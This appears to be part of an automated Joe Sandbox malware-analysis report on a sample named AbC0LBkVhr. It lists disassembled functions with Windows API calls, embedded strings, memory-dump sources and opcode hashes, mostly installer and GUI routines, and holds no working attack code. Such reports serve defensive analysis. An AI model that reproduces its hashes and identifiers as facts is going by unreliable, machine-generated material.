                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Stretch$A18830$A122A24620BitsMode
                                                          • String ID:
                                                          • API String ID: 430401518-0
                                                          • Opcode ID: c81279b313576d135e7f058ec71da99c22708ae42f226878f0d4e896de0476ba
                                                          • Instruction ID: 9b717f45caa71cbdb3d7743a5068819f31981c945c02765ea0762fde20f1409d
                                                          • Opcode Fuzzy Hash: c81279b313576d135e7f058ec71da99c22708ae42f226878f0d4e896de0476ba
                                                          • Instruction Fuzzy Hash: 17513F70604204AFDB14DFA8C985F9BBBF9EF08304F14459AB545E7692C778ED81CB58
                                                          APIs
                                                          • SendMessageA.USER32(00000000,?,?), ref: 0045714E
                                                            • Part of subcall function 00424274: GetWindowTextA.USER32(?,?,00000100), ref: 00424294
                                                            • Part of subcall function 0041EE9C: GetCurrentThreadId.KERNEL32 ref: 0041EEEB
                                                            • Part of subcall function 0041EE9C: 73A25940.USER32(00000000,0041EE4C,00000000,00000000,0041EF08,?,00000000,0041EF3F,?,0042EEA8,?,00000001), ref: 0041EEF1
                                                            • Part of subcall function 004242BC: SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004571B5
                                                          • TranslateMessage.USER32(?), ref: 004571D3
                                                          • DispatchMessageA.USER32(?), ref: 004571DC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Message$TextWindow$A25940CurrentDispatchSendThreadTranslate
                                                          • String ID: [Paused]
                                                          • API String ID: 3047529653-4230553315
                                                          • Opcode ID: 80c4c27c4b754fe1519de729eb729efa4ffa2fc2b03d19605f480c373ee661fa
                                                          • Instruction ID: 4dd0f6a69861fba71970a0c95394483262e0630457e8f7cd4854214566cc162d
                                                          • Opcode Fuzzy Hash: 80c4c27c4b754fe1519de729eb729efa4ffa2fc2b03d19605f480c373ee661fa
                                                          • Instruction Fuzzy Hash: EC3196319082449EDB11DFB5EC81B9E7FB8EB49314F5544BBF800E7292D63C9909CB69
                                                          APIs
                                                          • GetCursor.USER32(00000000,0046B37F), ref: 0046B2FC
                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0046B30A
                                                          • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B37F), ref: 0046B310
                                                          • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B37F), ref: 0046B31A
                                                          • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B37F), ref: 0046B320
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Cursor$LoadSleep
                                                          • String ID: CheckPassword
                                                          • API String ID: 4023313301-1302249611
                                                          • Opcode ID: c5bdf5f640806f8796bfbc41b1a4ab00d3ded5bef946e97f85f4201d994c149c
                                                          • Instruction ID: dcef8ef75e700f151948083f515970cfb06be99f29bdf3d7051495a11b4a934f
                                                          • Opcode Fuzzy Hash: c5bdf5f640806f8796bfbc41b1a4ab00d3ded5bef946e97f85f4201d994c149c
                                                          • Instruction Fuzzy Hash: 9D3190347402049FD701EF69C899B9E7BE4EB49304F5580B6B904DB3A2E7789E80CB89
                                                          APIs
                                                            • Part of subcall function 00477628: GetWindowThreadProcessId.USER32(00000000), ref: 00477630
                                                            • Part of subcall function 00477628: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477727,0049C0A4,00000000), ref: 00477643
                                                            • Part of subcall function 00477628: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477649
                                                          • SendMessageA.USER32(00000000,0000004A,00000000,00477ABA), ref: 00477735
                                                          • GetTickCount.KERNEL32 ref: 0047777A
                                                          • GetTickCount.KERNEL32 ref: 00477784
                                                          • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 004777D9
                                                          Strings
                                                          • CallSpawnServer: Unexpected response: $%x, xrefs: 0047776A
                                                          • CallSpawnServer: Unexpected status: %d, xrefs: 004777C2
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                          • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                          • API String ID: 613034392-3771334282
                                                          • Opcode ID: e1b07b7da0dc81f79c626057223c48b53da9c8a9430d466ab72b2e6b955821c4
                                                          • Instruction ID: 5facb6da61392f64ef9a6a7cc904dffa3fea64199446eda4e4b81d1598b422a3
                                                          • Opcode Fuzzy Hash: e1b07b7da0dc81f79c626057223c48b53da9c8a9430d466ab72b2e6b955821c4
                                                          • Instruction Fuzzy Hash: 0131E474F042158ADF10EBB9C8467EEB6A09B08304F90807AB508EB382D67C5E01C79D
                                                          APIs
                                                          • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 0045965F
                                                          Strings
                                                          • Fusion.dll, xrefs: 004595FF
                                                          • CreateAssemblyCache, xrefs: 00459656
                                                          • .NET Framework CreateAssemblyCache function failed, xrefs: 00459682
                                                          • Failed to load .NET Framework DLL "%s", xrefs: 00459644
                                                          • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045966A
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                          • API String ID: 190572456-3990135632
                                                          • Opcode ID: 6db9dd5a59cee9e125ea37fcdd1d071909f295375ba02b74572753309365d729
                                                          • Instruction ID: ee3dd963a50cff277cc460556b086b348bcce4d3c12070cda944c03b6b96f9ce
                                                          • Opcode Fuzzy Hash: 6db9dd5a59cee9e125ea37fcdd1d071909f295375ba02b74572753309365d729
                                                          • Instruction Fuzzy Hash: 5D315771E00609EBCB01EFA5C88169EB7A5AF44315F50857BE814A7382DB7C9E09CB99
                                                          APIs
                                                            • Part of subcall function 0041C040: GetObjectA.GDI32(?,00000018), ref: 0041C04D
                                                          • GetFocus.USER32 ref: 0041C160
                                                          • 73A1A570.USER32(?), ref: 0041C16C
                                                          • 73A18830.GDI32(?,?,00000000,00000000,0041C1EB,?,?), ref: 0041C18D
                                                          • 73A122A0.GDI32(?,?,?,00000000,00000000,0041C1EB,?,?), ref: 0041C199
                                                          • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1B0
                                                          • 73A18830.GDI32(?,00000000,00000000,0041C1F2,?,?), ref: 0041C1D8
                                                          • 73A1A480.USER32(?,?,0041C1F2,?,?), ref: 0041C1E5
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: A18830$A122A480A570BitsFocusObject
                                                          • String ID:
                                                          • API String ID: 2231653193-0
                                                          • Opcode ID: 9c9984a03792254f7cf3ad1787892f213a144d0a64db434cb782e1e94da2dcd6
                                                          • Instruction ID: 42301c90dcb8571f5cbc3500225c3f0eaf81cc24073f805a24a28427ce123417
                                                          • Opcode Fuzzy Hash: 9c9984a03792254f7cf3ad1787892f213a144d0a64db434cb782e1e94da2dcd6
                                                          • Instruction Fuzzy Hash: D7116D71A44618BBDF00DBE9CC81FAFB7FCEB48700F14446AB518E7281DA3899008B28
                                                          APIs
                                                          • GetSystemMetrics.USER32(0000000E), ref: 00418C68
                                                          • GetSystemMetrics.USER32(0000000D), ref: 00418C70
                                                          • 6F532980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C76
                                                            • Part of subcall function 004099A8: 6F52C400.COMCTL32(0049B628,000000FF,00000000,00418CA4,00000000,00418D00,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004099AC
                                                          • 6F59CB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D00,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CC6
                                                          • 6F59C740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D00,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CD1
                                                          • 6F59CB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D00,?,00000000,0000000D,00000000), ref: 00418CE4
                                                          • 6F530860.COMCTL32(0049B628,00418D07,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D00,?,00000000,0000000D,00000000,0000000E), ref: 00418CFA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: MetricsSystem$C400C740F530860F532980
                                                          • String ID:
                                                          • API String ID: 209721339-0
                                                          • Opcode ID: 3e87c7a23a4a947163f4d2b90e583babc0fab05060521c53009111721e1cf9e6
                                                          • Instruction ID: c5403bac5749a6cea20ad86aefc03aeb17a2f2ee6000d3a37742d6553dc7a201
                                                          • Opcode Fuzzy Hash: 3e87c7a23a4a947163f4d2b90e583babc0fab05060521c53009111721e1cf9e6
                                                          • Instruction Fuzzy Hash: 981124B1B44304BFDB10EBA9EC82F5E73B8DB48714F50406AB504EB2C2DAB99D408659
                                                          APIs
                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,004832E0), ref: 004832C5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen
                                                          • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                          • API String ID: 47109696-2530820420
                                                          • Opcode ID: 069f94f9fa12544f7a36e7bd85e6d1afcaa647915ea6f8fcf756052135ad9446
                                                          • Instruction ID: b53b4caf4df369742718f420b864b5eadf64457ff5313130662490eff196aabe
                                                          • Opcode Fuzzy Hash: 069f94f9fa12544f7a36e7bd85e6d1afcaa647915ea6f8fcf756052135ad9446
                                                          • Instruction Fuzzy Hash: 7E115130704244AADB10FFA59852B5F7BA8DB55B05F6188B7A800A7282D7389E02871D
                                                          APIs
                                                          • 73A1A570.USER32(00000000,?,?,00000000), ref: 00494A25
                                                            • Part of subcall function 0041A1E0: CreateFontIndirectA.GDI32(?), ref: 0041A29F
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00494A47
                                                          • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00494FC5), ref: 00494A5B
                                                          • GetTextMetricsA.GDI32(00000000,?), ref: 00494A7D
                                                          • 73A1A480.USER32(00000000,00000000,00494AA7,00494AA0,?,00000000,?,?,00000000), ref: 00494A9A
                                                          Strings
                                                          • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00494A52
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
                                                          • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                          • API String ID: 1435929781-222967699
                                                          • Opcode ID: 8e4816187cf5e8e7c6dd84ba3c8161288e1479147e1e53052227e353a50aa1d3
                                                          • Instruction ID: 4a1d9e00790e4e8279befe01d539e981fbc0a950f87c09723c3c89301347e02c
                                                          • Opcode Fuzzy Hash: 8e4816187cf5e8e7c6dd84ba3c8161288e1479147e1e53052227e353a50aa1d3
                                                          • Instruction Fuzzy Hash: FA015E76A44604AFDB14DBA9CC41E5EB7ECDB48704F610476B604E7281DA78AE008B6C
                                                          APIs
                                                          • SelectObject.GDI32(00000000,?), ref: 0041B468
                                                          • SelectObject.GDI32(?,00000000), ref: 0041B477
                                                          • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4A3
                                                          • SelectObject.GDI32(00000000,00000000), ref: 0041B4B1
                                                          • SelectObject.GDI32(?,00000000), ref: 0041B4BF
                                                          • DeleteDC.GDI32(00000000), ref: 0041B4C8
                                                          • DeleteDC.GDI32(?), ref: 0041B4D1
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ObjectSelect$Delete$Stretch
                                                          • String ID:
                                                          • API String ID: 1458357782-0
                                                          • Opcode ID: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                          • Instruction ID: d121cbdfe682723b668f1aba97a5ca8eb2ba63952d9ca8216d3140e682204302
                                                          • Opcode Fuzzy Hash: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                          • Instruction Fuzzy Hash: 46115C72E00619ABDB10DAD9DD85FEFB7BCEF08704F144555B614F7281C678AC418BA8
                                                          APIs
                                                          • GetCursorPos.USER32 ref: 004233A7
                                                          • WindowFromPoint.USER32(?,?), ref: 004233B4
                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233C2
                                                          • GetCurrentThreadId.KERNEL32 ref: 004233C9
                                                          • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233E2
                                                          • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 004233F9
                                                          • SetCursor.USER32(00000000), ref: 0042340B
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                          • String ID:
                                                          • API String ID: 1770779139-0
                                                          • Opcode ID: c9ba26483528a121f971c2dd70aae3c664ebef1f4767206ef3dc65e1b1b17165
                                                          • Instruction ID: 5b5036a29de233914ad27f5bfe0a39b591155b03ca34aa4f0141610fd726b6de
                                                          • Opcode Fuzzy Hash: c9ba26483528a121f971c2dd70aae3c664ebef1f4767206ef3dc65e1b1b17165
                                                          • Instruction Fuzzy Hash: 3501D4323046102AD6217B755C82E2F26E8DB85B29F60447FF504BB287DA3DAD11936D
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(user32.dll), ref: 00494848
                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00494855
                                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00494862
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$HandleModule
                                                          • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                          • API String ID: 667068680-2254406584
                                                          • Opcode ID: 21af07142c53872dca5cd0674b34382539a139ddeec0bf3a3c9dc52e9c6734d9
                                                          • Instruction ID: 57979f0f623c6713f86cfc51a9e85cc39870524a60e3ac3170e58067450f8277
                                                          • Opcode Fuzzy Hash: 21af07142c53872dca5cd0674b34382539a139ddeec0bf3a3c9dc52e9c6734d9
                                                          • Instruction Fuzzy Hash: 68F0F69AB01F5526DA20B5A69C42E7B6ACCCBC17A4F150137FD04B73C2E99C8C0242FD
                                                          APIs
                                                          • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D4B1
                                                          • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045D4C1
                                                          • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045D4D1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                          • API String ID: 190572456-212574377
                                                          • Opcode ID: cecd0a63045edb33e2202c29c90cf8f934e5a60212dd894f2f8d3c432b3cebaf
                                                          • Instruction ID: 50a43070f27201e9cf87661d87b97551d06431c7276cd5b4b6d770057bc484c9
                                                          • Opcode Fuzzy Hash: cecd0a63045edb33e2202c29c90cf8f934e5a60212dd894f2f8d3c432b3cebaf
                                                          • Instruction Fuzzy Hash: 4AF0B2B0D00701DAE724DFB65CC77263A959B6431AF1084379A4D55373D67814498F2D
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,00457011,004573B4,00456F68,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,004808CA), ref: 0042EA2D
                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA33
                                                          • InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA44
                                                            • Part of subcall function 0042E9A4: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA68,00000004,00499934,00457011,004573B4,00456F68,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9BA
                                                            • Part of subcall function 0042E9A4: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C0
                                                            • Part of subcall function 0042E9A4: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D1
                                                          • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,00457011,004573B4,00456F68,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA58
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                          • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                          • API String ID: 142928637-2676053874
                                                          • Opcode ID: 527a2f903435c6b8eae660c7438eac079e405392c9f84945f8436c24f6679cfa
                                                          • Instruction ID: b6413d45aefc5bd916056b1696ea31cacbebf8ca5ba9e8247451a7316c99a6de
                                                          • Opcode Fuzzy Hash: 527a2f903435c6b8eae660c7438eac079e405392c9f84945f8436c24f6679cfa
                                                          • Instruction Fuzzy Hash: C9E092A1741720EAEE10B7BA7D86FAA2558EB5072DF540037F100A51E1C7BD1C80CE9E
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F081), ref: 0044C7E3
                                                          • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C7F4
                                                          • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C804
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$LibraryLoad
                                                          • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                          • API String ID: 2238633743-1050967733
                                                          • Opcode ID: 20d4d3efedc32434c77936c95fe9c73e42e1c540f2b792c07eccd7c7435f7152
